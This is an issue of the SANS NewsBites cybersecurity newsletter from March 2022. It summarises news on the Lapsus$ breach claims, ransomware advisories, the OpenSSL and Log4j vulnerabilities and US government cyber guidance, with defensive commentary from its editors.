SANS NewsBites

Microsoft Investigating Lapsus$ Hacking Claims; Biden’s Statement on National Cybersecurity; TSA Cybersecurity Rules are Problematic

March 22, 2022  |  Volume XXIV - Issue #23

Top of the News


2022-03-21

Microsoft Investigating Lapsus$ Hacking Claims

Microsoft is investigating claims made by the Lapsus$ hacking group that it has compromised Azure DevOps source code repositories. Lapsus$ has previously stolen data from Nvidia, Samsung, Ubisoft, and others. Rather than infecting its targets with malware, Lapsus$ infiltrates networks, steals sensitive data, and attempts to exact ransom payments from its victims.

Editor's Note

The "Lapsus$" group has breached a number of other high profile targets. The claims should be taken seriously. Today, they also announced a breach of a company associated with Octa and they claimed to be going after Octa customers. Exposed RDP servers are one way how Lapsus$ is assumed to breach its targets. The goal is typically extortion.

Johannes Ullrich
Johannes Ullrich

While you cannot be certain of being or not being a target of the Lapsus$ group, you can make sure that your cyber hygiene is up to par. Make sure that you’re following best practices for your source code repositories, particularly any which are externally stored. Make sure you are only enabling the minimum access needed, that authorization/API or other security keys are NOT stored there. If you remove them, make sure they are rotated so that any downloaded or archived copies are not viable. MFA all externally accessible services, make sure there are no undocumented exceptions; keep those to the minimum possible.

Lee Neely
Lee Neely

2022-03-21

President Biden’s Statement on National Cybersecurity

President Joe Biden issued a statement “reiterating [earlier] warnings based on evolving intelligence that the Russian Government is exploring options for potential cyberattacks.” The president urged private sector organizations to harden their cyber defenses. The government is providing resources and tools through CISA’s Shields-Up campaign and lists steps for organizations to take in the fact sheet below.

Editor's Note

The warning is vague, but it links to some of the guidance CISA has been publishing. At this point, it is likely too late to fix your security program. Instead, check the list of CISA suggestions for any gaps. The announcement has been covered in many non-tech news outlets and management is likely going to ask if you are “ready.” It may be good to have a brief slide deck ready explaining where you stand (and good opportunity to get buy-in for things like MFA or whatever is missing). But please avoid “busy work.” Make sure not to overload your team with work at a time when they probably should rest a bit to get ready for the big event, should it happen.

Johannes Ullrich
Johannes Ullrich

The CISA has been publishing guidance on cyber hygiene you can leverage. They also offer services to help with scanning, analysis, or tool recommendations. Review their guidance, perform a gap analysis, then go get funding and resources for priority items such as MFA, modern endpoint and boundary protection services. Remember to make sure your SOC is equipped with the tools, including staff; they need to monitor and respond to incidents.

Lee Neely
Lee Neely

2022-03-17

TSA Pipeline Security Efforts are Faltering

Owners and operators of US pipelines say that the Transportation Security Administration’s (TSA’s) cybersecurity rules are (cumbersome and confusing and could put pipeline safety and supply at risk. Many of TSA’s pipeline cybersecurity requirements are more appropriate for personal computers than for operational technology.

Editor's Note

It’s easy to forget the TSA’s scope includes mass transit systems, ports, and pipelines. The lesson here is to make sure that regulations, policies etc. at any level, are relevant. While the requirements from TSA don’t necessarily apply to ICS, the goals of security awareness, strong authentication, segmentation, allowing only authorized devices and users access to these systems are appropriate. Supporting IT systems need to be up-to-snuff as well, leveraging endpoint protection, patching, and MFA where appropriate. With revisions the guidelines will make a better fit; in the interim, review them for what you can use, and document what is inappropriate to moderate regulators looking for you to follow the “letter of the law.”

Lee Neely
Lee Neely

Drafting regulation is difficult. TSA came late to this aspect of their responsibility. Whether or not TSA had the necessary knowledge, skills, abilities, and experience to regulate this aspect of its responsibility has been in question. They should seek the assistance of CISA and NIST to raise the security of the pipeline industry to an appropriate level.

William Hugh Murray
William Hugh Murray

The Rest of the Week's News


2022-03-21

FBI AvosLocker Ransomware Advisory

In a joint cybersecurity advisory, the FBI, the US Treasury Department, and the Financial Crimes Enforcement Network warn that the “AvosLocker … Ransomware as a Service (RaaS) affiliate-based group … has targeted victims across multiple critical infrastructure sectors in the United States including, but not limited to, the Financial Services, Critical Manufacturing, and Government Facilities sectors.” The advisory includes technical details, indicators of compromise, suggested mitigations, and other resources.

Editor's Note

This group typically exploits Exchange Server vulnerabilities as entry points. If you cannot migrate off on-premises Exchange servers, adopt an aggressive patching and vulnerability management posture. The AvosLocker RaaS group handles details such as ransom negotiation, publishing leaked data on their site, guiding victims to the payment sites, and will accept either Monero or Bitcoin (for a 10-25% fee). This shields affiliates from direct communication with the victims. Use the IoCs from IC3 to scan for activities.

Lee Neely
Lee Neely

2022-03-21

Ransomware Attack Shut Down Production at Bridgestone Subsidiary

Bridgestone has acknowledged that a subsidiary was the victim of a ransomware attack in February. The incident caused Bridgestone Americas to shut down its computer network and production for a week. Bridgestone is a supplier for Toyota; a different Toyota supplier experienced a ransomware attack shortly after the Bridgestone attack.

Editor's Note

Now that we’re emerging from challenges getting chips for modern vehicle electronics, we can’t get the tires to drive them. Fortunately, as a consumer you can buy tires from alternate manufacturers; it’s a bit harder for a factory to ask for a quick shipment of thousands of tires. When looking at alternate suppliers for your contingency plan, be sure to include how long it’s going to take to get a replacement order and if that disruption is tolerable. Stockpiling may not be the optimal answer; consider downsides.

Lee Neely
Lee Neely

2022-03-21

FIDO Alliance’s Vision for Passwordless Authentication

The FIDO (Fast Identity Online) Alliance has published a whitepaper describing what it believes are solutions to issues that have prevented passwordless authentication from being widely adopted. FIDO Alliance executive director Andrew Shikiar stated that “Not using a password should be easier than using a password.”

Editor's Note

Fraudulent reuse of passwords continues to be a frequent method of compromise. A preference for convenience is used as a justification for the continued use of passwords. One test of good design is that it makes it easier to do the right thing than the wrong thing. Cheap, powerful, portable clients make it possible to implement strong authentication without the use of passwords by the individual. Such implementation is urgent.

William Hugh Murray
William Hugh Murray

2022-03-21

NSA Cybersecurity Director: OpenSSL Vulnerability Can be Weaponized

NSA Cybersecurity Director Rob Joyce is urging organizations to patch a high-severity vulnerability in OpenSSL. Joyce tweeted, “With the current state of internet threats, recommend patching CVE-2022-0778 immediately. This flaw enables a pre-authentication DOS attack on OpenSSL. I know it is "only" rated a 7.5 CVE, but definitely can be weaponized.”

Editor's Note

Yes, the vulnerability can be weaponized for a DoS attack. But is this your #1 priority right now? Apply patches as they become available. Don't get distracted by "squirrels" but stick to your vulnerability management protocol on this one. Updated packages are available for various Linux distributions that should be straightforward to apply.

Johannes Ullrich
Johannes Ullrich

The patch was released on March 15th; apply it when it is available. If you’re still on OpenSSL 1.0.2 – it’s time to go to 1.1.1n or higher. The flaw is triggered by elliptic curve keys where the explicit curve parameters are invalid.

Lee Neely
Lee Neely

2022-03-18

Nearly One-Third of Log4j Instances Still Not Patched

Researchers from Qualys found that 30 percent of Log4j instances remain unpatched, more than three months after the vulnerability was first disclosed. Within 72 hours of its initial disclosure, there were nearly one million attempts to exploit the flaw.

Editor's Note

No surprise here. This isn't an "easy" vulnerability to patch and it usually doesn't patch "itself" via more or less automatic operating system updates. While log4j is no longer at the top of the list of vulnerabilities attackers scan for, it now has entered the dangerous zone of exploits that are more used in targeted attacks and less in widespread scans by bots.

Johannes Ullrich
Johannes Ullrich

The low-hanging fruit is patched at this point; many are waiting for updates from vendors. For Internet-facing applications, make sure that your WAF is configured to handle attempted Log4J exploits. Make sure you’re actively monitoring for attempted exploits and your response plan is known. Track internally discovered Log4J instances to make sure they are addressed as software is either updated or retired. Watch for orphaned systems no longer getting automatic updates.

Lee Neely
Lee Neely

2022-03-21

Apple Outages Resolved

Apple has resolved issued that caused outages of multiple cloud-based services on Monday, March 21. The incident affected the App Store, Apple Music, iCloud Mail, Maps, and iMessage. The services were reportedly restored by 3:45pm ET.

Editor's Note

There is no such thing as too big (or too small) to fail. Given the scope of the outage, Apple was back on its feet relatively quickly. How fast could you recover if you got hit hard? When thinking of fall-back practices, such as hand-written sales receipts, include processes for entering and reconciling them into systems once recovered, making sure resources are identified and know how to do that. Think about how you would communicate internally and externally. Then test those assumptions.

Lee Neely
Lee Neely

Internet Storm Center Tech Corner

Scans for Movable Type Vulnerability (CVE-2021-20837)

https://isc.sans.edu/forums/diary/Scans+for+Movable+Type+Vulnerability+CVE202120837/28454/


SolarWinds Advisory: Unauthenticated Access in Web Help Desk (12.7.5)

https://isc.sans.edu/forums/diary/SolarWinds+Advisory+Unauthenticated+Access+in+Web+Help+Desk+1275/28456/


MGLNDD_* Scans

https://isc.sans.edu/forums/diary/MGLNDD+Scans/28458/


Maldoc Cleaned by Anti-Virus

https://isc.sans.edu/forums/diary/Maldoc+Cleaned+by+AntiVirus/28460/


CAPTCHA Phishing

https://www.avanan.com/blog/using-captcha-forms-to-bypass-filters


Browser in the Browser Templates

https://mrd0x.com/browser-in-the-browser-phishing-attack/


Serpent, No Swiping! New Backdoor Targets French Entities with Unique Attack Chain

https://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain


IBM Spectrum Protect Update

https://www.ibm.com/support/pages/node/6564745


Lapsus$ May have Breached Microsoft

https://www.theregister.com/2022/03/21/microsoft_lapsus_breach_probe/


Statement by President Biden on our Nation's Cybersecurity

https://www.whitehouse.gov/briefing-room/statements-releases/2022/03/21/statement-by-president-biden-on-our-nations-cybersecurity/